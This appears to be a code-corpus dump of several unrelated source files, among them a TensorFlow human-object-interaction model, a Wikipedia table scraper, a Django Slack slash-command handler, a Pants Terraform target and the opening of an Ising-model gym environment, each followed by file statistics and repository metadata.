verb_to_HO_matrix, obj_to_HO_matrix = get_convert_matrix(self.verb_num_classes, self.obj_num_classes)
self.obj_to_HO_matrix = tf.constant(obj_to_HO_matrix, tf.float32)
self.verb_to_HO_matrix = tf.constant(verb_to_HO_matrix, tf.float32)
self.gt_obj_class = tf.cast(tf.matmul(self.gt_class_HO, self.obj_to_HO_matrix, transpose_b=True) > 0,
tf.float32)
self.gt_verb_class = tf.cast(tf.matmul(self.gt_class_HO, self.verb_to_HO_matrix, transpose_b=True) > 0,
tf.float32)
def init_table(self):
pass
def set_ph(self, image, image_id, num_pos, Human_augmented, Object_augmented, action_HO, sp):
if image is not None: self.image = image
if image_id is not None: self.image_id = image_id
if sp is not None: self.spatial = sp
if Human_augmented is not None: self.H_boxes = Human_augmented
if Object_augmented is not None: self.O_boxes = Object_augmented
if action_HO is not None: self.gt_class_HO = action_HO
self.H_num = num_pos
self.reset_classes()
def reset_classes(self):
from ult.tools import get_convert_matrix
verb_to_HO_matrix, obj_to_HO_matrix = get_convert_matrix(self.verb_num_classes, self.obj_num_classes)
self.obj_to_HO_matrix = tf.constant(obj_to_HO_matrix, tf.float32)
self.verb_to_HO_matrix = tf.constant(verb_to_HO_matrix, tf.float32)
self.gt_obj_class = tf.cast(tf.matmul(self.gt_class_HO, self.obj_to_HO_matrix, transpose_b=True) > 0,
tf.float32)
self.gt_verb_class = tf.cast(tf.matmul(self.gt_class_HO, self.verb_to_HO_matrix, transpose_b=True) > 0,
tf.float32)
def build_base(self):
with tf.variable_scope(self.scope, self.scope, reuse=tf.AUTO_REUSE,):
net = resnet_utils.conv2d_same(self.image, 64, 7, stride=2, scope='conv1')
net = tf.pad(net, [[0, 0], [1, 1], [1, 1], [0, 0]])
net = slim.max_pool2d(net, [3, 3], stride=2, padding='VALID', scope='pool1')
return net
def image_to_head(self, is_training):
with slim.arg_scope(resnet_arg_scope(is_training=False)):
net = self.build_base()
net, _ = resnet_v1.resnet_v1(net,
self.blocks[0:cfg.RESNET.FIXED_BLOCKS],
global_pool=False,
include_root_block=False,
reuse=tf.AUTO_REUSE,
scope=self.scope)
with slim.arg_scope(resnet_arg_scope(is_training=is_training)):
if self.model_name.__contains__('unique_weights'):
print("unique_weights3")
stop = -3
else:
stop = -2
head, _ = resnet_v1.resnet_v1(net,
self.blocks[cfg.RESNET.FIXED_BLOCKS:stop],
global_pool=False,
include_root_block=False,
reuse=tf.AUTO_REUSE,
scope=self.scope)
return head
def sp_to_head(self):
with tf.variable_scope(self.scope, self.scope, reuse=tf.AUTO_REUSE,):
ends = 2
if self.model_name.__contains__('_spose'):
ends = 3
conv1_sp = slim.conv2d(self.spatial[:,:,:,0:ends], 64, [5, 5], padding='VALID', scope='conv1_sp')
pool1_sp = slim.max_pool2d(conv1_sp, [2, 2], scope='pool1_sp')
conv2_sp = slim.conv2d(pool1_sp, 32, [5, 5], padding='VALID', scope='conv2_sp')
pool2_sp = slim.max_pool2d(conv2_sp, [2, 2], scope='pool2_sp')
pool2_flat_sp = slim.flatten(pool2_sp)
return pool2_flat_sp
def res5(self, pool5_H, pool5_O, sp, is_training, name):
with slim.arg_scope(resnet_arg_scope(is_training=is_training)):
if pool5_H is None:
fc7_H = None
else:
fc7_H, _ = resnet_v1.resnet_v1(pool5_H,
self.blocks[-2:-1],
global_pool=False,
include_root_block=False,
reuse=tf.AUTO_REUSE,
scope=self.scope)
# fc7_H = tf.reduce_mean(fc7_H, axis=[1, 2])
if pool5_O is None:
fc7_O = None
else:
fc7_O, _ = resnet_v1.resnet_v1(pool5_O,
self.blocks[-1:],
global_pool=False,
include_root_block=False,
reuse=tf.AUTO_REUSE,
scope=self.scope)
# fc7_O = tf.reduce_mean(fc7_O, axis=[1, 2])
return fc7_H, fc7_O
def head_to_tail(self, fc7_H, fc7_O, pool5_SH, pool5_SO, sp, is_training, name):
with slim.arg_scope(resnet_arg_scope(is_training=is_training)):
fc7_SH = tf.reduce_mean(pool5_SH, axis=[1, 2])
fc7_SO = tf.reduce_mean(pool5_SO, axis=[1, 2])
Concat_SH = tf.concat([fc7_H, fc7_SH], 1)
fc8_SH = slim.fully_connected(Concat_SH, self.num_fc, scope='fc8_SH', reuse=tf.AUTO_REUSE)
fc8_SH = slim.dropout(fc8_SH, keep_prob=0.5, is_training=is_training, scope='dropout8_SH')
fc9_SH = slim.fully_connected(fc8_SH, self.num_fc, scope='fc9_SH', reuse=tf.AUTO_REUSE)
fc9_SH = slim.dropout(fc9_SH, keep_prob=0.5, is_training=is_training, scope='dropout9_SH')
Concat_SO = tf.concat([fc7_O, fc7_SO], 1)
fc8_SO = slim.fully_connected(Concat_SO, self.num_fc, scope='fc8_SO', reuse=tf.AUTO_REUSE)
fc8_SO = slim.dropout(fc8_SO, keep_prob=0.5, is_training=is_training, scope='dropout8_SO')
fc9_SO = slim.fully_connected(fc8_SO, self.num_fc, scope='fc9_SO', reuse=tf.AUTO_REUSE)
fc9_SO = slim.dropout(fc9_SO, keep_prob=0.5, is_training=is_training, scope='dropout9_SO')
Concat_SHsp = tf.concat([fc7_H, sp], 1)
Concat_SHsp = slim.fully_connected(Concat_SHsp, self.num_fc, scope='Concat_SHsp', reuse=tf.AUTO_REUSE)
Concat_SHsp = slim.dropout(Concat_SHsp, keep_prob=0.5, is_training=is_training, scope='dropout6_SHsp')
fc7_SHsp = slim.fully_connected(Concat_SHsp, self.num_fc, scope='fc7_SHsp', reuse=tf.AUTO_REUSE)
fc7_SHsp = slim.dropout(fc7_SHsp, keep_prob=0.5, is_training=is_training, scope='dropout7_SHsp')
return fc9_SH, fc9_SO, fc7_SHsp
def crop_pool_layer(self, bottom, rois, name):
with tf.variable_scope(name) as scope:
batch_ids = tf.squeeze(tf.slice(rois, [0, 0], [-1, 1], name="batch_id"), [1])
bboxes = self.trans_boxes_by_feats(bottom, rois)
if cfg.RESNET.MAX_POOL:
pre_pool_size = cfg.POOLING_SIZE * 2
crops = tf.image.crop_and_resize(bottom, bboxes, tf.to_int32(batch_ids), [pre_pool_size, pre_pool_size], name="crops")
crops = slim.max_pool2d(crops, [2, 2], padding='SAME')
else:
crops = tf.image.crop_and_resize(bottom, bboxes, tf.to_int32(batch_ids), [cfg.POOLING_SIZE, cfg.POOLING_SIZE], name="crops")
return crops
def trans_boxes_by_feats(self, bottom, rois):
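        # tf.image.crop_and_resize expects boxes normalized to [0, 1] in
        # (y1, x1, y2, x2) order, so rescale the image-space ROIs by the
        # input extent reconstructed from the feature map shape and stride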
bottom_shape = tf.shape(bottom)
height = (tf.to_float(bottom_shape[1]) - 1.) * np.float32(self.stride[0])
width = (tf.to_float(bottom_shape[2]) - 1.) * np.float32(self.stride[0])
x1 = tf.slice(rois, [0, 1], [-1, 1], name="x1") / width
y1 = tf.slice(rois, [0, 2], [-1, 1], name="y1") / height
x2 = tf.slice(rois, [0, 3], [-1, 1], name="x2") / width
y2 = tf.slice(rois, [0, 4], [-1, 1], name="y2") / height
bboxes = tf.stop_gradient(tf.concat([y1, x1, y2, x2], axis=1))
return bboxes
def attention_pool_layer_H(self, bottom, fc7_H, is_training, name):
with tf.variable_scope(name) as scope:
fc1 = slim.fully_connected(fc7_H, 512, scope='fc1_b')
fc1 = slim.dropout(fc1, keep_prob=0.8, is_training=is_training, scope='dropout1_b')
fc1 = tf.reshape(fc1, [tf.shape(fc1)[0], 1, 1, tf.shape(fc1)[1]])
att = tf.reduce_mean(tf.multiply(bottom, fc1), 3, keep_dims=True)
return att
def attention_norm_H(self, att, name):
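        # softmax over the flattened spatial dimensions so each attention
        # map sums to 1 across image positions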
with tf.variable_scope(name) as scope:
att = tf.transpose(att, [0, 3, 1, 2])
att_shape = tf.shape(att)
att = tf.reshape(att, [att_shape[0], att_shape[1], -1])
att = tf.nn.softmax(att)
att = tf.reshape(att, att_shape)
att = tf.transpose(att, [0, 2, 3, 1])
return att
def attention_pool_layer_O(self, bottom, fc7_O, is_training, name):
with tf.variable_scope(name) as scope:
fc1 = slim.fully_connected(fc7_O, 512, scope='fc1_b')
fc1 = slim.dropout(fc1, keep_prob=0.8, is_training=is_training, scope='dropout1_b')
fc1 = tf.reshape(fc1, [tf.shape(fc1)[0], 1, 1, tf.shape(fc1)[1]])
att = tf.reduce_mean(tf.multiply(bottom, fc1), 3, keep_dims=True)
return att
def attention_norm_O(self, att, name):
with tf.variable_scope(name) as scope:
att = tf.transpose(att, [0, 3, 1, 2])
att_shape = tf.shape(att)
att = tf.reshape(att, [att_shape[0], att_shape[1], -1])
att = tf.nn.softmax(att)
att = tf.reshape(att, att_shape)
att = tf.transpose(att, [0, 2, 3, 1])
return att
def region_classification(self, fc7_H, fc7_O, fc7_SHsp, is_training, initializer, name):
with tf.variable_scope(name) as scope:
cls_score_H = slim.fully_connected(fc7_H, self.num_classes,
weights_initializer=initializer,
trainable=is_training,
activation_fn=None, scope='cls_score_H')
cls_prob_H = tf.nn.sigmoid(cls_score_H, name='cls_prob_H')
tf.reshape(cls_prob_H, [-1, self.num_classes])
cls_score_O = slim.fully_connected(fc7_O, self.num_classes,
weights_initializer=initializer,
trainable=is_training,
activation_fn=None, scope='cls_score_O')
cls_prob_O = tf.nn.sigmoid(cls_score_O, name='cls_prob_O')
tf.reshape(cls_prob_O, [-1, self.num_classes])
cls_score_sp = slim.fully_connected(fc7_SHsp, self.num_classes,
weights_initializer=initializer,
trainable=is_training,
activation_fn=None, scope='cls_score_sp')
cls_prob_sp = tf.nn.sigmoid(cls_score_sp, name='cls_prob_sp')
tf.reshape(cls_prob_sp, [-1, self.num_classes])
self.predictions["cls_score_H"] = cls_score_H
self.predictions["cls_prob_H"] = cls_prob_H
self.predictions["cls_score_O"] = cls_score_O
self.predictions["cls_prob_O"] = cls_prob_O
self.predictions["cls_score_sp"] = cls_score_sp
self.predictions["cls_prob_sp"] = cls_prob_sp
self.predictions["cls_prob_HO"] = cls_prob_sp * (cls_prob_O + cls_prob_H)
return cls_prob_H, cls_prob_O, cls_prob_sp
def bottleneck(self, bottom, is_training, name, reuse=False):
with tf.variable_scope(name) as scope:
if reuse:
scope.reuse_variables()
head_bottleneck = slim.conv2d(bottom, 1024, [1, 1], scope=name)
return head_bottleneck
def build_network(self, is_training):
initializer = tf.random_normal_initializer(mean=0.0, stddev=0.01)
# ResNet Backbone
head = self.image_to_head(is_training)
sp = self.sp_to_head()
pool5_H = self.crop_pool_layer(head, self.H_boxes, 'Crop_H')
pool5_O = self.crop_pool_layer(head, self.O_boxes[:self.H_num,:], 'Crop_O')
fc7_H, fc7_O = self.res5(pool5_H, pool5_O, sp, is_training, 'res5')
fc7_H = tf.reduce_mean(fc7_H, axis=[1, 2])
fc7_O = tf.reduce_mean(fc7_O, axis=[1, 2])
# Phi
head_phi = slim.conv2d(head, 512, [1, 1], scope='head_phi')
# g
head_g = slim.conv2d(head, 512, [1, 1], scope='head_g')
Att_H = self.attention_pool_layer_H(head_phi, fc7_H, is_training, 'Att_H')
Att_H = self.attention_norm_H(Att_H, 'Norm_Att_H')
att_head_H = tf.multiply(head_g, Att_H)
Att_O = self.attention_pool_layer_O(head_phi, fc7_O, is_training, 'Att_O')
Att_O = self.attention_norm_O(Att_O, 'Norm_Att_O')
att_head_O = tf.multiply(head_g, Att_O)
pool5_SH = self.bottleneck(att_head_H, is_training, 'bottleneck', False)
pool5_SO = self.bottleneck(att_head_O, is_training, 'bottleneck', True)
# fc7_O = tf.Print(fc7_O, [tf.shape(fc7_O), tf.shape(fc7_H)], message='check fc7_O:')
fc7_SH, fc7_SO, fc7_SHsp = self.head_to_tail(fc7_H, fc7_O, pool5_SH, pool5_SO, sp, is_training, 'fc_HO')
# fc7_SO = tf.Print(fc7_SO, [tf.shape(fc7_SO), tf.shape(fc7_SH), tf.shape(fc7_SHsp)], message='check fc7_SHsp:')
cls_prob_H, cls_prob_O, cls_prob_sp = self.region_classification(fc7_SH, fc7_SO, fc7_SHsp, is_training, initializer, 'classification')
self.score_summaries.update(self.predictions)
self.visualize["attention_map_H"] = (Att_H - tf.reduce_min(Att_H[0,:,:,:])) / tf.reduce_max((Att_H[0,:,:,:] - tf.reduce_min(Att_H[0,:,:,:])))
self.visualize["attention_map_O"] = (Att_O - tf.reduce_min(Att_O[0,:,:,:])) / tf.reduce_max((Att_O[0,:,:,:] - tf.reduce_min(Att_O[0,:,:,:])))
return cls_prob_H, cls_prob_O, cls_prob_sp
def create_architecture(self, is_training):
self.build_network(is_training)
# for var in tf.trainable_variables():
# self.train_summaries.append(var)
if is_training: self.add_loss()
layers_to_output = {}
layers_to_output.update(self.losses)
val_summaries = []
if is_training:
with tf.device("/cpu:0"):
# val_summaries.append(self.add_gt_image_summary_H())
# val_summaries.append(self.add_gt_image_summary_HO())
# tf.summary.image('ATTENTION_MAP_H', self.visualize["attention_map_H"], max_outputs=1)
# tf.summary.image('ATTENTION_MAP_O', self.visualize["attention_map_O"], max_outputs=1)
for key, var in self.visualize.items():
tf.summary.image(key, var, max_outputs=1)
for key, var in self.event_summaries.items():
val_summaries.append(tf.summary.scalar(key, var))
# val_summaries.append(tf.summary.scalar('lr', self.lr))
self.summary_op = tf.summary.merge_all()
self.summary_op_val = tf.summary.merge(val_summaries)
return layers_to_output
def add_loss(self):
with tf.variable_scope('LOSS') as scope:
cls_score_H = self.predictions["cls_score_H"]
cls_score_O = self.predictions["cls_score_O"]
cls_score_sp = self.predictions["cls_score_sp"]
label_HO = self.gt_class_HO
H_cross_entropy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = label_HO[:self.H_num,:], logits = cls_score_H[:self.H_num,:]))
O_cross_entropy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = label_HO[:self.H_num,:], logits = cls_score_O[:self.H_num,:]))
sp_cross_entropy = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels = label_HO, logits = cls_score_sp))
self.losses['H_cross_entropy'] = H_cross_entropy
self.losses['O_cross_entropy'] = O_cross_entropy
self.losses['sp_cross_entropy'] = sp_cross_entropy
loss = H_cross_entropy + O_cross_entropy + sp_cross_entropy
self.losses['total_loss'] = loss
self.event_summaries.update(self.losses)
return loss
def add_gt_image_summary_H(self):
image = tf.py_func(draw_bounding_boxes_HOI,
[tf.reverse(self.image+cfg.PIXEL_MEANS, axis=[-1]), self.H_boxes, self.gt_class_HO],
tf.float32, name="gt_boxes_H")
return tf.summary.image('GROUND_TRUTH_H', image)
def add_gt_image_summary_HO(self):
image = tf.py_func(draw_bounding_boxes_HOI,
[tf.reverse(self.image+cfg.PIXEL_MEANS, axis=[-1]), self.O_boxes, self.gt_class_HO],
tf.float32, name="gt_boxes_HO")
        return tf.summary.image('GROUND_TRUTH_HO', image)
def add_score_summary(self, key, tensor):
if tensor is not None and tensor.op is not None:
tf.summary.histogram('SCORE/' + tensor.op.name + '/' + key + '/scores', tensor)
def add_train_summary(self, var):
tf.summary.histogram('TRAIN/' + var.op.name, var)
def get_feed_dict(self, blobs):
feed_dict = {self.image: blobs['image'], self.H_boxes: blobs['H_boxes'],
self.O_boxes: blobs['O_boxes'], self.gt_class_HO: blobs['gt_class_HO'],
self.spatial: blobs['sp'],
# self.lr: lr,
self.H_num: blobs['H_num']}
return feed_dict
def train_step(self, sess, blobs, lr, train_op):
feed_dict = self.get_feed_dict(blobs)
loss, _ = sess.run([self.losses['total_loss'],
train_op],
feed_dict=feed_dict)
return loss
def train_step_with_summary(self, sess, blobs, lr, train_op):
feed_dict = self.get_feed_dict(blobs)
loss, summary, _ = sess.run([self.losses['total_loss'],
self.summary_op,
train_op],
feed_dict=feed_dict)
return loss, summary
def train_step_tfr(self, sess, blobs, lr, train_op):
loss, image_id, _ = sess.run([self.losses['total_loss'], self.image_id,
train_op])
return loss, image_id
def train_step_tfr_with_summary(self, sess, blobs, lr, train_op):
loss, summary, image_id, _ = sess.run([self.losses['total_loss'],
self.summary_op, self.image_id,
train_op])
return loss, image_id, summary
def test_image_HO(self, sess, image, blobs):
feed_dict = {self.image: image, self.H_boxes: blobs['H_boxes'], self.O_boxes: blobs['O_boxes'], self.spatial: blobs['sp'], self.H_num: blobs['H_num']}
cls_prob_HO = sess.run([self.predictions["cls_prob_HO"]], feed_dict=feed_dict)
return cls_prob_HO
def obtain_all_preds(self, sess, image, blobs):
feed_dict = {self.image: image, self.H_boxes: blobs['H_boxes'], self.O_boxes: blobs['O_boxes'],
self.spatial: blobs['sp'], self.H_num: blobs['H_num']}
cls_prob_HO, pH, pO, pSp = sess.run([self.predictions["cls_prob_HO"], self.predictions["cls_prob_H"],
self.predictions["cls_prob_O"], self.predictions["cls_prob_sp"]], feed_dict=feed_dict)
return cls_prob_HO, pH, pO, pSp, pSp
def obtain_all_preds_tfr(self, sess):
cls_prob_HO, pH, pO, pSp = sess.run([self.predictions["cls_prob_HO"], self.predictions["cls_prob_H"],
self.predictions["cls_prob_O"], self.predictions["cls_prob_sp"]])
return cls_prob_HO, pH, pO, pSp, pSp | 52.949757 | 158 | 0.589654 | 4,596 | 32,670 | 3.959312 | 0.147955 | 0.026928 | 0.018794 | 0.015717 | 0.432269 | 0.356158 | 0.320218 | 0.292081 | 0.262131 | 0.238116 | 0 | 0.215662 | 0.283532 | 32,670 | 617 | 159 | 52.949757 | 0.561755 | 0.031742 | 0 | 0.219462 | 0 | 0 | 0.037002 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068323 | false | 0.00207 | 0.031056 | 0 | 0.15735 | 0.006211 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
621e26224a5b7df57e76176ccf102f633408ef39 | 290 | py | Python | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | models/catch_event.py | THM-MA/XSDATA-waypoint | dd94442f9d6677c525bf3ebb03c15fec52fa1079 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from .t_catch_event import TCatchEvent
__NAMESPACE__ = "http://www.omg.org/spec/BPMN/20100524/MODEL"
@dataclass
class CatchEvent(TCatchEvent):
class Meta:
name = "catchEvent"
namespace = "http://www.omg.org/spec/BPMN/20100524/MODEL"
| 24.166667 | 65 | 0.731034 | 36 | 290 | 5.722222 | 0.583333 | 0.126214 | 0.15534 | 0.184466 | 0.417476 | 0.417476 | 0.417476 | 0.417476 | 0.417476 | 0 | 0 | 0.065306 | 0.155172 | 290 | 11 | 66 | 26.363636 | 0.77551 | 0 | 0 | 0 | 0 | 0 | 0.331034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
622719ea6c5735ec54aa9dbdf7b5a6d8d0c52ce7 | 1,115 | py | Python | hard-gists/1191457/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 21 | 2019-07-08T08:26:45.000Z | 2022-01-24T23:53:25.000Z | hard-gists/1191457/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 5 | 2019-06-15T14:47:47.000Z | 2022-02-26T05:02:56.000Z | hard-gists/1191457/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 17 | 2019-05-16T03:50:34.000Z | 2021-01-14T14:35:12.000Z | #!/usr/bin/env python
import urllib
import sys
import json
from mwlib import parser
from mwlib.refine import compat
if __name__ == "__main__":
params = urllib.urlencode({
"format": "json",
"action": "query",
"prop": "revisions",
"rvprop": "content",
"titles": "ISO_3166-1",
"rvsection": "4",
})
wc = urllib.urlopen("http://en.wikipedia.org/w/api.php?%s" % params)
if wc.getcode() != 200:
print "Fail!"
sys.exit(2)
raw = wc.read()
rdata = json.loads(raw)
wc.close()
page = rdata['query']['pages'].itervalues().next()
if not page:
print "NO page found"
sys.exit(3)
revision = page['revisions'][0]
if not revision:
print "NO revision found"
sys.exit(4)
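    # with rvprop=content the revision dict is typically {'*': '<wikitext>'};
    # grab its only value regardless of the key name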
content = revision[str(revision.keys()[0])]
parsed = compat.parse_txt(content)
table = parsed.find(parser.Table)[0]
if not table:
print "Table not found"
sys.exit(5)
for row in table.children:
cells = row.find(parser.Cell)
print cells[0].asText().replace("}}", "").replace("{{", "").strip() + \
" || " + cells[1].asText().strip() + " || " + cells[2].asText().strip() \
+ " || " + cells[3].asText().strip()
| 22.755102 | 75 | 0.625112 | 155 | 1,115 | 4.432258 | 0.509677 | 0.040757 | 0.052402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021482 | 0.165022 | 1,115 | 48 | 76 | 23.229167 | 0.716434 | 0.017937 | 0 | 0 | 0 | 0 | 0.184644 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.125 | null | null | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6228f1664df5b9ec6866831755970b61d71b6d58 | 3,058 | py | Python | ECC_main/platform/slack.py | dongh9508/ECC-main | 904110b70ba3e459d92c6d21a5ad1693b4ee726a | [
"MIT"
] | 2 | 2019-01-23T00:04:18.000Z | 2019-02-01T10:09:15.000Z | ECC_main/platform/slack.py | dongh9508/ECC-main | 904110b70ba3e459d92c6d21a5ad1693b4ee726a | [
"MIT"
] | 26 | 2018-07-11T07:59:46.000Z | 2021-02-08T20:21:46.000Z | ECC_main/platform/slack.py | dongh9508/ECC-main | 904110b70ba3e459d92c6d21a5ad1693b4ee726a | [
"MIT"
] | 2 | 2018-08-31T14:08:19.000Z | 2018-08-31T15:14:29.000Z | from .platformBase import PlatformBase
from django.http import HttpResponse, JsonResponse
from ECC_main.baseRequest import BaseRequest
import ECC_main.settings
import threading
import requests
class Slack(PlatformBase):
def slash_command(request, func):
token = request.POST['token']
if ECC_main.settings.SLACK_VERIFICATION_TOKEN == token:
print("authenticated!")
json_body = Slack._get_json_list(request)
slash_response = Slack._func_start(json_body, func)
if slash_response.lazy_slash_response is not None:
Slack.lazy_slash_command(json_body, slash_response)
if slash_response.response_type is None:
slash_response['response_type'] = 'ephemeral'
if slash_response.status != 200 or slash_response.text == "":
json_response = JsonResponse(slash_response, status=slash_response.status)
else:
json_response = JsonResponse(slash_response)
return json_response
else:
print("unauthenticated")
return HttpResponse(status=403)
def lazy_slash_command(json_body, slash_response):
func, args, kwargs, request_result_func = slash_response.lazy_slash_response.get_lazy()
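        # Slack expects slash commands to answer within ~3 seconds, so the
        # slow handler runs on a thread and later POSTs its result to the
        # request's response_url (Slack's delayed-response mechanism)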
def async_func(*_args, **_kwargs):
print('lazy send func start')
slash_response = func(*_args, **_kwargs)
chat_id = Slack._get_chat_id(json_body)
response_url = Slack._get_response_url(json_body)
if slash_response.response_type is None:
slash_response['response_type'] = 'in_channel'
response = Slack._send_message(slash_response, response_url)
if request_result_func is not None:
request_result_func(response)
threading.Thread(target=async_func, args=args, kwargs=kwargs).start()
def platform():
return 'slack'
def _get_chat_id(json_body):# return channel_id
return json_body['channel_id']
def _get_user_id(json_body):
return json_body['user_id']
def _get_user_name(json_body):
return json_body['user_name']
def _get_json_list(request_body):
return request_body.POST
def _get_response_url(json_body):
return json_body['response_url']
def _func_start(json_body, func):
platform = Slack.platform()
text = Slack._get_text(json_body)
user_name = Slack._get_user_name(json_body)
user_id = Slack._get_user_id(json_body)
baseRequest = BaseRequest(platform, text, user_name, user_id)
return func(baseRequest)
def _get_text(json_body):
return json_body['text']
def _send_message(slash_response, response_url):
return requests.post(response_url, json=slash_response) | 35.149425 | 95 | 0.624591 | 345 | 3,058 | 5.156522 | 0.17971 | 0.089938 | 0.070826 | 0.056211 | 0.392917 | 0.175379 | 0.106802 | 0.065205 | 0.065205 | 0.065205 | 0 | 0.002808 | 0.301177 | 3,058 | 87 | 96 | 35.149425 | 0.829668 | 0.005559 | 0 | 0.065574 | 0 | 0 | 0.048026 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.196721 | false | 0 | 0.098361 | 0.131148 | 0.491803 | 0.04918 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
6232c87d0d4107ba98750270bdd408dd5d0b9dfa | 1,389 | py | Python | src/python/pants/backend/terraform/target_types.py | danxmoran/pants | 7fafd7d789747c9e6a266847a0ccce92c3fa0754 | [
"Apache-2.0"
] | null | null | null | src/python/pants/backend/terraform/target_types.py | danxmoran/pants | 7fafd7d789747c9e6a266847a0ccce92c3fa0754 | [
"Apache-2.0"
] | 22 | 2022-01-27T09:59:50.000Z | 2022-03-30T07:06:49.000Z | src/python/pants/backend/terraform/target_types.py | danxmoran/pants | 7fafd7d789747c9e6a266847a0ccce92c3fa0754 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from pants.engine.rules import collect_rules
from pants.engine.target import (
COMMON_TARGET_FIELDS,
Dependencies,
FieldSet,
MultipleSourcesField,
Target,
generate_multiple_sources_field_help_message,
)
from pants.util.strutil import softwrap
class TerraformModuleSourcesField(MultipleSourcesField):
default = ("*.tf",)
expected_file_extensions = (".tf",)
ban_subdirectories = True
help = generate_multiple_sources_field_help_message(
"Example: `sources=['example.tf', 'new_*.tf', '!old_ignore.tf']`"
)
@dataclass(frozen=True)
class TerraformFieldSet(FieldSet):
required_fields = (TerraformModuleSourcesField,)
sources: TerraformModuleSourcesField
class TerraformModuleTarget(Target):
alias = "terraform_module"
core_fields = (*COMMON_TARGET_FIELDS, Dependencies, TerraformModuleSourcesField)
help = softwrap(
"""
A single Terraform module corresponding to a directory.
There must only be one `terraform_module` in a directory.
Use `terraform_modules` to generate `terraform_module` targets for less boilerplate.
"""
)
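# A hypothetical BUILD file using this target might look like (sketch only;
# the target name and file patterns are illustrative):
#
#     terraform_module(
#         name="network",
#         sources=["*.tf", "!legacy.tf"],
#     )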
def rules():
return collect_rules()
| 26.711538 | 92 | 0.735781 | 145 | 1,389 | 6.834483 | 0.551724 | 0.060545 | 0.030272 | 0.060545 | 0.078708 | 0.078708 | 0 | 0 | 0 | 0 | 0 | 0.005277 | 0.181425 | 1,389 | 51 | 93 | 27.235294 | 0.866315 | 0.090713 | 0 | 0 | 0 | 0 | 0.084314 | 0.022549 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.166667 | 0.033333 | 0.633333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6236a853e217ec41f065c4c8899eb05e1e528ac1 | 21,375 | py | Python | ToricLearning/ising.py | danielfreeman11/thermal-toric-code | 3718f1b16737dfae09443466f6cfb65036faaa89 | [
"MIT"
] | 6 | 2017-11-15T00:54:13.000Z | 2021-11-21T02:08:21.000Z | ToricLearning/ising.py | danielfreeman11/thermal-toric-code | 3718f1b16737dfae09443466f6cfb65036faaa89 | [
"MIT"
] | null | null | null | ToricLearning/ising.py | danielfreeman11/thermal-toric-code | 3718f1b16737dfae09443466f6cfb65036faaa89 | [
"MIT"
] | null | null | null | """
Ising model one-shot dynamics simulation.
From C. Daniel Freeman (2016 http://arxiv.org/abs/1603.05005)
"""
import logging
import math
import gym
from gym import spaces
from gym.utils import seeding
import numpy as np
#import isingutils.py
import random
from random import choice
import copy
import sys
from compiler.ast import flatten
from numpy import *
logger = logging.getLogger(__name__)
class IsingEnv(gym.Env):
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second' : 50
}
def __init__(self):
#Holds transform objects for rendering
self.translist = []
self.error_translist = []
self.TotalTime = 0.
#self.NextActionTime = 0.
#self.NextActionProbability = 0.
self.SystemLength = 24
self.Temperature = .15
self.Delta = 1.0
self.CreationRate = abs(1./(1-np.exp(self.Delta*1.0/self.Temperature)))
self.AnnihilationRate = abs(1./(1-np.exp(-self.Delta*1.0/self.Temperature)))
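        # Bose-factor-like thermal rates: their ratio satisfies detailed balance,
        # CreationRate/AnnihilationRate = exp(-Delta/Temperature), so at T = 0.15
        # and Delta = 1 pair creation is ~1e-3 as likely as annihilation.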
self.HoppingRate = .01#self.Temperature
self.CorrectionRate = 1.
self.Sector = 0
